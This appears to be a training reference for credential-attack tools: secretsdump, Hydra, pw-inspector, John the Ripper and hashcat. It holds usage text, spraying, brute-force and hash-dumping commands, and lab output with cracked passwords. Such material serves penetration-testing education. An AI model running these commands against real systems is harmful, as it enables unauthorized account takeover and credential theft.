secretsdump.py

Description

Performs various techniques to dump hashes from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\Temp dir) and read the rest of the data from there. For NTDS.DIT the default is the DRSUAPI (directory replication) approach, which needs an account holding replication rights on the domain; -use-vss instead copies the file out of a shadow copy through one of the exec methods. Either way, the hive copies written to %SYSTEMROOT%\Temp are an artifact left on the target.

Platform: Python
Author: Alberto Solino
License: Modified Apache License 1.1
URL: secretsdump.py

Usage

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
 
usage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]
                      [-security SECURITY] [-sam SAM] [-ntds NTDS]
                      [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]
                      [-use-vss] [-exec-method [{smbexec,wmiexec,mmcexec}]]
                      [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]
                      [-pwd-last-set] [-user-status] [-history]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k]
                      [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]
                      [-target-ip ip address]
                      target
 
Performs various techniques to dump secrets from the remote machine without
executing any agent there.
 
positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
                        or LOCAL (if you want to parse local files)
 
optional arguments:
  -h, --help            show this help message and exit
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON
  -system SYSTEM        SYSTEM hive to parse
  -bootkey BOOTKEY      bootkey for SYSTEM hive
  -security SECURITY    SECURITY hive to parse
  -sam SAM              SAM hive to parse
  -ntds NTDS            NTDS.DIT file to parse
  -resumefile RESUMEFILE
                        resume file name to resume NTDS.DIT session dump (only
                        available to DRSUAPI approach). This file will also be
                        used to keep updating the session's state
  -outputfile OUTPUTFILE
                        base output filename. Extensions will be added for
                        sam, secrets, cached and ntds
  -use-vss              Use the VSS method instead of default DRSUAPI
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec
 
display options:
  -just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach. Implies also
                        -just-dc switch
  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos
                        keys)
  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)
  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account.
                        Doesn't apply to -outputfile data
  -user-status          Display whether or not the user is disabled
  -history              Dump password history, and LSA secrets OldVal
 
authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)
  -keytab KEYTAB        Read keys for SPN from keytab file
 
connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it uses
                        the domain part (FQDN) specified in the target
                        parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will
                        use whatever was specified as target. This is useful
                        when target is the NetBIOS name and you cannot resolve
                        it

Examples

secretsdump.py -ntds ./ntds.dit -system ./system -outputfile /tmp/hashes.txt LOCAL

This parses a saved copy of ntds.dit offline (target LOCAL) using the bootkey extracted from the saved SYSTEM hive; the bootkey unlocks the Password Encryption Key (PEK) that protects the hashes inside ntds.dit, so both files must come from the same machine. Note that -outputfile is a base name to which secretsdump appends an extension, so the hashes end up in /tmp/hashes.txt.ntds rather than /tmp/hashes.txt.

Blog Posts

THC-Hydra

Description

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add.

Usage

Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
 
Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -r        use a non-random shuffling method for option -x
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -O        use old SSL v2 and v3
  -K        do not redo failed attempts (good for -M mass scanning)
  -q        do not print messages about connection errors
  -U        service module usage details
  -m OPT    options specific for a module, see -U output for information
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)
 
Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smb2 smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
 
Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL v3.0. The newest version is always available at;
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)
These services were not compiled in: afp mongodb ncp oracle sapr3.
 
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)
 
Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

Examples

 hydra -L /opt/passwords/facebook-f.last-100.txt -p Winter2022 -m workgroup:\{hiboxy\} x.x.x.x smb2

This uses the usernames in the specified file and sprays the single password Winter2022 against all of them, authenticating to the hiboxy domain (-m workgroup:{hiboxy}; the braces are escaped only to keep the shell from interpreting them) over SMB2 at the specified domain controller. Spraying one password per pass keeps each account's bad-password count at one, which is the point of the technique; check the domain lockout threshold and observation window before coming back with a second password.

sec@slingshot:~$ hydra -L /opt/passwords/facebook-f.last-100.txt -p Winter2022 -m workgroup:{hiboxy} 10.130.10.4 smb2
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-15 20:00:21
[DATA] max 16 tasks per 1 server, overall 16 tasks, 100 login tries (l:100/p:1), ~7 tries per task
[DATA] attacking smb2://10.130.10.4:445/workgroup:{hiboxy}
[445][smb2] host: 10.130.10.4   login: janderson   password: Winter2022
[445][smb2] host: 10.130.10.4   login: alee   password: Winter2022
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-15 20:00:24

hydra -l bgreen -P /opt/passwords/simple.txt x.x.x.x ssh

This will attempt to brute force the bgreen account using the passwords in the provided file over the ssh protocol. The warning in the output is worth heeding: sshd's MaxStartups setting limits concurrent unauthenticated connections, so running with -t 4 avoids dropped connections that hydra would otherwise have to retry or write to a restore file.

sec@slingshot:~$ hydra -l bgreen -P /opt/passwords/simple.txt 10.130.10.10 ssh
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-15 23:27:13
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 34 login tries (l:1/p:34), ~3 tries per task
[DATA] attacking ssh://10.130.10.10:22/
[22][ssh] host: 10.130.10.10   login: bgreen   password: Password1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-15 23:27:18

hydra -C /opt/passwords/hiboxy-breach.txt x.x.x.x -m workgroup:\{hiboxy\} smb2

This command will use the login:password pairs in the provided file (one colon-separated pair per line, as -C expects) against the domain controller for the hiboxy domain using the smb2 protocol. Because each login is tried only with its own password, this is the right form for replaying credentials from a breach dump rather than crossing every user with every password.

sec@slingshot:~$ hydra -C /opt/passwords/hiboxy-breach.txt 10.130.10.4 -m workgroup:{hiboxy} smb2
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-15 23:33:52
[DATA] max 16 tasks per 1 server, overall 16 tasks, 22 login tries, ~2 tries per task
[DATA] attacking smb2://10.130.10.4:445/workgroup:{hiboxy}
[445][smb2] host: 10.130.10.4   login: bking   password: ThaBoss1
[445][smb2] host: 10.130.10.4   login: jmartin   password: Quincy626
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-15 23:33:53

Blog Posts

pw-inspector

Description

A THC Hydra tool to reduce the password list (based on known password policies, etc.).

Usage

PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [https://github.com/vanhauser-thc/thc-hydra]
 
Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s
 
Options:
  -i FILE    file to read passwords from (default: stdin)
  -o FILE    file to write valid passwords to (default: stdout)
  -m MINLEN  minimum length of a valid password
  -M MAXLEN  maximum length of a valid password
  -c MINSETS the minimum number of sets required (default: all given)
Sets:
  -l         lowcase characters (a,b,c,d, etc.)
  -u         upcase characters (A,B,C,D, etc.)
  -n         numbers (1,2,3,4, etc.)
  -p         printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
  -s         special characters - all others not within the sets above
 
PW-Inspector reads passwords in and prints those which meet the requirements.
The return code is the number of valid passwords found, 0 if none was found.
Use for security: check passwords, if 0 is returned, reject password choice.
Use for hacking: trim your dictionary file to the pw requirements of the target.
Usage only allowed for legal purposes.

Examples
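
pw-inspector is not installed everywhere, so the following is an added example (not part of thc-hydra) that reimplements its filter in Python under the semantics described in the help above: length bounds plus a minimum number of character sets, with the default requiring every listed set. How pw-inspector itself classifies spaces and non-ASCII characters is an assumption here. The sample wordlist is constructed and includes the two passwords that worked in the hydra runs above; the policy shown (8+ characters, three of the four classes l/u/n/p) is a common corporate setting and corresponds to `pw-inspector -m 8 -c 3 -l -u -n -p`.

```python
"""Trim a wordlist to a password policy, mirroring pw-inspector's length and character-set switches.
Added example, not part of thc-hydra; set semantics follow the help text above."""

# Character-class tests named after pw-inspector's switches: l, u, n are ASCII letters/digits,
# p is any other printable ASCII character, s is everything else (non-ASCII, control characters).
SETS = {
    "l": lambda ch: ch.isascii() and ch.islower(),
    "u": lambda ch: ch.isascii() and ch.isupper(),
    "n": lambda ch: ch.isascii() and ch.isdigit(),
    "p": lambda ch: ch.isascii() and ch.isprintable() and not ch.isalnum(),
}
SETS["s"] = lambda ch: not any(SETS[k](ch) for k in "lunp")


def classes_present(password: str, sets: str) -> int:
    """How many of the requested sets have at least one character in the password."""
    return sum(1 for name in sets if any(SETS[name](ch) for ch in password))


def meets_policy(password: str, minlen: int = 0, maxlen=None, sets: str = "", minsets=None) -> bool:
    """True if length is within [minlen, maxlen] and at least minsets of the named sets occur.
    Like pw-inspector -c, minsets defaults to all of the listed sets."""
    if len(password) < minlen or (maxlen is not None and len(password) > maxlen):
        return False
    if minsets is None:
        minsets = len(sets)
    return classes_present(password, sets) >= minsets


def trim_wordlist(words, **policy) -> list:
    """Keep only the candidates worth sending to hydra or john under the policy."""
    return [w for w in words if meets_policy(w, **policy)]


# Constructed sample wordlist; Winter2022 and Password1 are the two that worked in the hydra runs above.
SAMPLE_WORDS = ["password", "Winter2022", "Password1", "P@ss", "summer", "Qwerty!2", "änderung9"]

if __name__ == "__main__":
    # At least 8 characters and three of the four classes l/u/n/p,
    # i.e. the equivalent of: pw-inspector -m 8 -c 3 -l -u -n -p
    for word in trim_wordlist(SAMPLE_WORDS, minlen=8, sets="lunp", minsets=3):
        print(word)  # Winter2022, Password1, Qwerty!2
```

Feeding the trimmed list to hydra -P or john --wordlist cuts the attempts spent on candidates the target would never have accepted, which matters most when a lockout policy limits how many guesses each account can absorb.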

Blog Posts

John the Ripper

Description

John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.

Platform: All
Author: Openwall
License: GPLv3
URL: https://www.openwall.com/john/

Usage

John the Ripper 1.9.0-jumbo-1 OMP [linux-gnu 64-bit x86_64 AVX2 AC]
Copyright (c) 1996-2019 by Solar Designer and others
Homepage: http://www.openwall.com/john/
 
Usage: john [OPTIONS] [PASSWORD-FILES]
--single[=SECTION[,..]]    "single crack" mode, using default or named rules
--single=:rule[,..]        same, using "immediate" rule(s)
--wordlist[=FILE] --stdin  wordlist mode, read words from FILE or stdin
                  --pipe   like --stdin, but bulk reads, and allows rules
--loopback[=FILE]          like --wordlist, but extract words from a .pot file
--dupe-suppression         suppress all dupes in wordlist (and force preload)
--prince[=FILE]            PRINCE mode, read words from FILE
--encoding=NAME            input encoding (eg. UTF-8, ISO-8859-1). See also
                           doc/ENCODINGS and --list=hidden-options.
--rules[=SECTION[,..]]     enable word mangling rules (for wordlist or PRINCE
                           modes), using default or named rules
--rules=:rule[;..]]        same, using "immediate" rule(s)
--rules-stack=SECTION[,..] stacked rules, applied after regular rules or to
                           modes that otherwise don't support rules
--rules-stack=:rule[;..]   same, using "immediate" rule(s)
--incremental[=MODE]       "incremental" mode [using section MODE]
--mask[=MASK]              mask mode using MASK (or default from john.conf)
--markov[=OPTIONS]         "Markov" mode (see doc/MARKOV)
--external=MODE            external mode or word filter
--subsets[=CHARSET]        "subsets" mode (see doc/SUBSETS)
--stdout[=LENGTH]          just output candidate passwords [cut at LENGTH]
--restore[=NAME]           restore an interrupted session [called NAME]
--session=NAME             give a new session the NAME
--status[=NAME]            print status of a session [called NAME]
--make-charset=FILE        make a charset file. It will be overwritten
--show[=left]              show cracked passwords [if =left, then uncracked]
--test[=TIME]              run tests and benchmarks for TIME seconds each
--users=[-]LOGIN|UID[,..]  [do not] load this (these) user(s) only
--groups=[-]GID[,..]       load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..]     load users with[out] this (these) shell(s) only
--salts=[-]COUNT[:MAX]     load salts with[out] COUNT [to MAX] hashes
--costs=[-]C[:M][,...]     load salts with[out] cost value Cn [to Mn]. For
                           tunable cost parameters, see doc/OPTIONS
--save-memory=LEVEL        enable memory saving, at LEVEL 1..3
--node=MIN[-MAX]/TOTAL     this node's number range out of TOTAL count
--fork=N                   fork N processes
--pot=NAME                 pot file to use
--list=WHAT                list capabilities, see --list=help or doc/OPTIONS
--devices=N[,..]           set OpenCL device(s) (see --list=opencl-devices)
--format=NAME              force hash of type NAME. The supported formats can
                           be seen with --list=formats and --list=subformats

Examples

john ~/labs/web01.hashes

This will run john in default mode and try to crack the hashes in the provided file.

msf6 exploit(windows/smb/psexec) > john labs/web01.hashes
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "LM-opencl"
Use the "--format=LM-opencl" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "NT-opencl"
Use the "--format=NT-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 38 password hashes with no different salts (LM [DES 256/256 AVX2])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 78 candidates buffered for the current salt, minimum 512 needed for performance.
Proceeding with wordlist:/usr/local/share/john/password.lst, rules:Wordlist
                 (dmckenzie)
                 (ckhan)
                 (phorne)
                 (egeorge)
                 (pmartin)
                 (scook)
                 (kkennedy)
                 (srichardson)
                 (dbryant)
                 (sbates)
                 (cgentry)
                 (khansen)
                 (abates)
                 (nramos)
                 (dwilliams)
                 (rduarte)
                 (ksutton)
                 (kcooper)
                 (hhopkins)
                 (jrivera)
                 (vcollins)
                 (mmiller)
                 (awalker)
                 (tandersen)
                 (lstout)
                 (mlara)
                 (wrobinson)
                 (rgray)
                 (aparker)
                 (slopez)
                 (antivirus)
                 (SROCAdmin)
                 (WDAGUtilityAccount)
                 (DefaultAccount)
                 (Guest)
                 (Administrator)
Proceeding with incremental:LM_ASCII
MIMIGOT          (vberry:1)
KNENZ2G          (vberry:2)
38g 0:00:00:02 DONE 3/3 (2022-03-17 01:29) 15.01g/s 40495Kp/s 40495Kc/s 48036KC/s KNEIRS8..KNENZ2G
Warning: passwords printed above might be partial
Use the "--show --format=LM" options to display all of the cracked passwords reliably
Session completed

john ~/labs/web01.hashes --show

This command prints the entries for the given file that are already cracked according to the pot file, in the user:LMplain:rid:LM:NT::: layout. It was run after the LM session above, so "38 password hashes cracked, 0 left" refers to the LM hashes only: the second field holds the upper-cased LM plaintext where one existed (vberry), the empty LM field aad3b435b51404eeaad3b435b51404ee means no LM hash was stored, and the NT hashes still have to be cracked with --format=NT to obtain the exact case.

sec560@slingshot:~$ sudo john labs/web01.hashes --show
Administrator::500:aad3b435b51404eeaad3b435b51404ee:1ef98de8555541f1579f98084f32875b:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount::503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount::504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
SROCAdmin::1008:aad3b435b51404eeaad3b435b51404ee:2e920723943f81ec0af0fd735f737fef:::
antivirus::1009:aad3b435b51404eeaad3b435b51404ee:47f0ca5913c6e70090d7b686afb9e13e:::
slopez::1010:aad3b435b51404eeaad3b435b51404ee:87e968ead530264915a4b295c57c37d5:::
aparker::1011:aad3b435b51404eeaad3b435b51404ee:9b5684b030226a1203e4e7b718a3f9df:::
rgray::1012:aad3b435b51404eeaad3b435b51404ee:23d26a03aa7102abce4805d88e568a78:::
wrobinson::1013:aad3b435b51404eeaad3b435b51404ee:5deaec4b57b859c25cdd0513fb7bc750:::
mlara::1014:aad3b435b51404eeaad3b435b51404ee:d8d9eee954da5f2d42fe72f862fa493f:::
lstout::1015:aad3b435b51404eeaad3b435b51404ee:ca3f0e9ce3188b0602742da2976d6773:::
tandersen::1016:aad3b435b51404eeaad3b435b51404ee:bf459116e5854e34031997be8e13596d:::
awalker::1017:aad3b435b51404eeaad3b435b51404ee:fe1f27a2561b61511588b0d24e333a7c:::
mmiller::1018:aad3b435b51404eeaad3b435b51404ee:7a1f1fd59eb2b97041c74748ea6a68f8:::
vcollins::1019:aad3b435b51404eeaad3b435b51404ee:5bd9b7b6fce76d3aabfebee9debaa932:::
jrivera::1020:aad3b435b51404eeaad3b435b51404ee:baa90a3ad89d359009ce5425063dff3e:::
hhopkins::1021:aad3b435b51404eeaad3b435b51404ee:92929561b2758f409df2b4a24a59c6f4:::
kcooper::1022:aad3b435b51404eeaad3b435b51404ee:5ae44bf0a1e24c0b1ec96708f30e7b84:::
ksutton::1023:aad3b435b51404eeaad3b435b51404ee:a6051a02b7a2bfb4cd0e2c1a9cb4a694:::
rduarte::1024:aad3b435b51404eeaad3b435b51404ee:7ce56170c73f9582fa348db88de2c192:::
dwilliams::1025:aad3b435b51404eeaad3b435b51404ee:c6fd7d8bb36d8862c1b978896a6bec51:::
nramos::1026:aad3b435b51404eeaad3b435b51404ee:0f46bafd2c4acdac0003a1ff4da92625:::
abates::1027:aad3b435b51404eeaad3b435b51404ee:62a56ba1b94193d7f553b895bca28292:::
khansen::1028:aad3b435b51404eeaad3b435b51404ee:fc9fdcdbf09c5be4928287e4ad847dd7:::
vberry:MIMIGOTKNENZ2G:1029:97abc432e5e8e8a03b9ce0ab2b8f2634:d99438ebb5f67b113dab1f907e26979b:::
cgentry::1030:aad3b435b51404eeaad3b435b51404ee:059db5a4061f5a2cb5053e753f9664b4:::
sbates::1031:aad3b435b51404eeaad3b435b51404ee:4f8bfa5d78d7a6398915c9657cd49769:::
dbryant::1032:aad3b435b51404eeaad3b435b51404ee:858bf9272facf23b3593f609e5b64c06:::
srichardson::1033:aad3b435b51404eeaad3b435b51404ee:819dc07ca50e1729d72214e8e9ee8f3a:::
kkennedy::1034:aad3b435b51404eeaad3b435b51404ee:7c3acf216ef4ec061b9330e0ad103c35:::
scook::1035:aad3b435b51404eeaad3b435b51404ee:2d474458480f9aa524ba3ebb1f3f9e6e:::
pmartin::1036:aad3b435b51404eeaad3b435b51404ee:98f9db311936bea281e9a65f45dd1f62:::
egeorge::1037:aad3b435b51404eeaad3b435b51404ee:f482c3342543f49df31a5a240a0558cf:::
phorne::1038:aad3b435b51404eeaad3b435b51404ee:b9a04517b70e549f8b2e4153ee8f4107:::
ckhan::1039:aad3b435b51404eeaad3b435b51404ee:aff059fe35c553548f56db9c85b2d90c:::
dmckenzie::1040:aad3b435b51404eeaad3b435b51404ee:50a173c77e22c87c419cacb5e0629b52:::
 
38 password hashes cracked, 0 left

john --format=nt --wordlist=/opt/passwords/rockyou.txt ~/labs/web01.hashes

The following is the output when you run john with a wordlist against the NT hashes in the same file. --format=nt is required because john auto-detected the file as LM in the run above; NT hashes are case-sensitive, so the plaintexts printed here are exact, unlike the upper-cased LM results.

sec560@slingshot:~$ sudo john --format=nt --wordlist=/opt/passwords/rockyou.txt ~/labs/web01.hashes
Using default input encoding: UTF-8
Loaded 36 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Remaining 35 password hashes with no different salts
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
Warrior07        (vcollins)
Tibbetts3        (slopez)
Patrique2238     (wrobinson)
Packardbell350   (mlara)
Oozle11          (aparker)
KAMTPS20!!tim    (rgray)
Chirmol01        (awalker)
BHLMSTz2         (mmiller)
Angels100%       (tandersen)
2soWht!a         (lstout)
10g 0:00:00:00 DONE (2022-03-17 01:46) 10.30g/s 14787Kp/s 14787Kc/s 475458KC/s  Ttwwl789..*7¡Vamos!
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

zip2john ./backup.zip > ./backup.hashes

This produces a john-crackable hash from an encrypted zip file and stores it in backup.hashes. The NOTE in the output matters: zip2john assumes every member of the archive shares one password, and if they do not, -o selects a single member so the resulting hash is still crackable.

└─$ zip2john ./backup.zip > ./backup.hashes
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
john --format=Raw-MD5 --wordlist=./wordlist8.txt ./passhash.txt

This command will attempt to crack a raw MD5 password hash using the wordlist.

└─$ john --format=Raw-MD5 --wordlist=./wordlist8.txt ./passhash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty789        (?)    
1g 0:00:00:00 DONE (2022-03-27 14:12) 50.00g/s 1891Kp/s 1891Kc/s 1891KC/s snapdragon..play2win
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

Blog Posts

hashcat

Description

World’s fastest password cracker

Platform: All
Author: Jens Steube
License: MIT
URL: https://hashcat.net/hashcat/

Usage

hashcat (v6.2.4) starting in help mode
 
Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...
 
- [ Options ] -
 
 Options Short / Long           | Type | Description                                          | Example
================================+======+======================================================+=======================
 -m, --hash-type                | Num  | Hash-type, references below (otherwise autodetect)   | -m 1000
 -a, --attack-mode              | Num  | Attack-mode, see references below                    | -a 3
 -V, --version                  |      | Print version                                        |
 -h, --help                     |      | Print help                                           |
     --quiet                    |      | Suppress output                                      |
     --hex-charset              |      | Assume charset is given in hex                       |
     --hex-salt                 |      | Assume salt is given in hex                          |
     --hex-wordlist             |      | Assume words in wordlist are given in hex            |
     --force                    |      | Ignore warnings                                      |
     --deprecated-check-disable |      | Enable deprecated plugins                            |
     --status                   |      | Enable automatic update of the status screen         |
     --status-json              |      | Enable JSON format for status output                 |
     --status-timer             | Num  | Sets seconds between status screen updates to X      | --status-timer=1
     --stdin-timeout-abort      | Num  | Abort if there is no input from stdin for X seconds  | --stdin-timeout-abort=300
     --machine-readable         |      | Display the status view in a machine-readable format |
     --keep-guessing            |      | Keep guessing the hash after it has been cracked     |
     --self-test-disable        |      | Disable self-test functionality on startup           |
     --loopback                 |      | Add new plains to induct directory                   |
     --markov-hcstat2           | File | Specify hcstat2 file to use                          | --markov-hcstat2=my.hcstat2
     --markov-disable           |      | Disables markov-chains, emulates classic brute-force |
     --markov-classic           |      | Enables classic markov-chains, no per-position       |
 -t, --markov-threshold         | Num  | Threshold X when to stop accepting new markov-chains | -t 50
     --runtime                  | Num  | Abort session after X seconds of runtime             | --runtime=10
     --session                  | Str  | Define specific session name                         | --session=mysession
     --restore                  |      | Restore session from --session                       |
     --restore-disable          |      | Do not write restore file                            |
     --restore-file-path        | File | Specific path to restore file                        | --restore-file-path=x.restore
 -o, --outfile                  | File | Define outfile for recovered hash                    | -o outfile.txt
     --outfile-format           | Str  | Outfile format to use, separated with commas         | --outfile-format=1,3
     --outfile-autohex-disable  |      | Disable the use of $HEX[] in output plains           |
     --outfile-check-timer      | Num  | Sets seconds between outfile checks to X             | --outfile-check=30
     --wordlist-autohex-disable |      | Disable the conversion of $HEX[] from the wordlist   |
 -p, --separator                | Char | Separator char for hashlists and outfile             | -p :
     --stdout                   |      | Do not crack a hash, instead print candidates only   |
     --show                     |      | Compare hashlist with potfile; show cracked hashes   |
     --left                     |      | Compare hashlist with potfile; show uncracked hashes |
     --username                 |      | Enable ignoring of usernames in hashfile             |
     --remove                   |      | Enable removal of hashes once they are cracked       |
     --remove-timer             | Num  | Update input hash file each X seconds                | --remove-timer=30
     --potfile-disable          |      | Do not write potfile                                 |
     --potfile-path             | File | Specific path to potfile                             | --potfile-path=my.pot
     --encoding-from            | Code | Force internal wordlist encoding from X              | --encoding-from=iso-8859-15
     --encoding-to              | Code | Force internal wordlist encoding to X                | --encoding-to=utf-32le
     --debug-mode               | Num  | Defines the debug mode (hybrid only by using rules)  | --debug-mode=4
     --debug-file               | File | Output file for debugging rules                      | --debug-file=good.log
     --induction-dir            | Dir  | Specify the induction directory to use for loopback  | --induction=inducts
     --outfile-check-dir        | Dir  | Specify the outfile directory to monitor for plains  | --outfile-check-dir=x
     --logfile-disable          |      | Disable the logfile                                  |
     --hccapx-message-pair      | Num  | Load only message pairs from hccapx matching X       | --hccapx-message-pair=2
     --nonce-error-corrections  | Num  | The BF size range to replace AP's nonce last bytes   | --nonce-error-corrections=16
     --keyboard-layout-mapping  | File | Keyboard layout mapping table for special hash-modes | --keyb=german.hckmap
     --truecrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --truecrypt-keyf=x.png
     --veracrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --veracrypt-keyf=x.txt
